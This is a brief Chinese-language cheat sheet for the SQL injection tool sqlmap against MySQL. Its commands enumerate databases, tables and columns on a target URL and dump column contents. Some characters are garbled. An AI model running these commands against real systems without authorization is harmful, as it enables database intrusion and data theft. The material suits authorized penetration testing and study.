0x01 安裝
0x02 使用
- 對(duì)于mysql數(shù)據(jù)庫(kù):
-threads 10 //10個(gè)線程查詢
sqlmap.py -u "url" -b //查詢數(shù)據(jù)庫(kù)類型
sqlmap.py -u "url" --dbs //查詢包含哪些數(shù)據(jù)庫(kù)
sqlmap.py -u "url" -D 數(shù)據(jù)庫(kù)名 --tables //有目的性的查詢方式查詢數(shù)據(jù)庫(kù)表谆吴,省時(shí)
sqlmap.py -u "url" --tables //查詢所有的數(shù)據(jù)庫(kù)的所有表,較耗時(shí)
sqlmap.py -u "url" -D 數(shù)據(jù)庫(kù)名 -T 所需查的表名 --columns //查詢列的內(nèi)容(-D 數(shù)據(jù)庫(kù)名可無(wú))
sqlmap.py -u "url" -D 數(shù)據(jù)庫(kù)名 -T 表名 -C "列名" --dump //查詢列的內(nèi)容